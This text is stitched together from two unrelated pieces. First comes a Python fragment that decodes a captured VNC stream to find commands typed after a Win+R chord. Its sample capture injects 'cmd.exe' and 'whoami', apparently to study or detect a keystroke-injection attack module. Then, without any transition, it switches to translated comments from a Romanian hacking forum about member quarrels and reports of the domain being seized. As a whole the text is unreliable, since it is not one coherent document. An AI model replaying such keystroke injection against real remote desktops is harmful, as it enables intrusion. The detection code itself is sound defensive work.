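    """Map a keysym to a readable name; printable ASCII maps to itself."""
    if keysym in KEYSYM_NAMES:
        return KEYSYM_NAMES[keysym]
    if 0x20 <= keysym <= 0x7E:
        return chr(keysym)
    return "0x%04x" % keysym


def typed_commands(stream):
    """Return (launcher, line) for every Enter-terminated line typed after a launcher chord."""
    held, line, launcher, findings = [], [], None, []
    for down, keysym in iter_key_events(stream):
        name = key_name(keysym)
        if not down:
            if name in held:
                held.remove(name)
            continue
        active = [k for k in held if k in MODIFIERS]
        held.append(name)
        if active:                             # key pressed while a modifier is held
            if (active[0], name) in LAUNCHERS:
                launcher, line = LAUNCHERS[(active[0], name)], []
            continue
        if name == "Enter":
            if launcher and line:
                findings.append((launcher, "".join(line)))
            line = []
        elif len(name) == 1:
            line.append(name)
    return findings


def key_event(down, keysym):
    """Encode one KeyEvent; same bytes the module builds by hand."""
    return struct.pack(">BBxxI", KEY_EVENT, down, keysym)


def tap(text):
    """Press and release each character of text."""
    return b"".join(key_event(1, ord(c)) + key_event(0, ord(c)) for c in text)


# Constructed capture: setup messages, Win+R, "cmd.exe", then a harmless command.
# Enter is pressed but never released, as in the module's exec_command.
SAMPLE_STREAM = (
    struct.pack(">BxHii", 2, 2, 0, 1)                    # SetEncodings: Raw, CopyRect
    + struct.pack(">BBHHHH", 3, 0, 0, 0, 800, 600)       # FramebufferUpdateRequest
    + key_event(1, 0xFFEB) + key_event(1, ord("r"))
    + key_event(0, ord("r")) + key_event(0, 0xFFEB)
    + struct.pack(">BBHH", 5, 0, 10, 10)                 # PointerEvent
    + tap("cmd.exe") + key_event(1, 0xFF0D)
    + tap("whoami") + key_event(1, 0xFF0D)
)

if __name__ == "__main__":
    for launcher, text in typed_commands(SAMPLE_STREAM):
        print("%s -> %r" % (launcher, text))
```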
  18. 19 @askwrite insert another coin, that's the day I was born.
  19. It gives me great pleasure to see haters like you commenting. I want to let you know that back then I was 12/13 years old and nobody said I knew too much, but sure, let's back you up; it's fashionable to comment nonsense, especially since "attacks between users" are being promoted. I hope the person I'm referring to got the message. Anyway, enough, I have neither the mood nor the time for pointless childishness; have it your way.
  20. Still, there is a limit. As Zatarra said some time ago (I think it was him, I'm not sure): "if it has come to the point where you have to put the moderators on ignore, that's serious."
  21. I really loved and still love RST, with its good and its bad sides. I learned a great deal here. Yes, maybe most people don't like me, maybe I've been cursed at and attacked "n" times, but you could take one thing from me (devotion): I am on RST to help, to try to do something for this forum, just as this forum did something for me. Putting all the banter and crap aside. Almost all of you have forgotten the most important thing, love for this forum... I'm not saying I haven't made mistakes, we all do, but instead of attacking each other we would do better to respect each other...
  22. I understand perfectly what you're saying, spiri. We all miss those times, but one thing I know for sure: those times are gone. Now if you make a mistake in how you express yourself you get cursed at and taken to p..., and if you make any mistake it's the same. A great pity! @Zatarra every time I tried to do something, and not just me, most of the time it turned out exactly....Why? Because some people think they're too good, superior, and are bursting with pride.
  23. Aerosol

    Fun stuff

    @CM3D next level, what would someone like me know...
  24. Was the rstforums.com domain seized by the authorities? | Cik.Ro – Adrian Tanase Blog
      RSTFORUMS hacked? | RoForum.Net
      serialepenet.ro shut down by the authorities - ArenaWeb
      no comment ) :/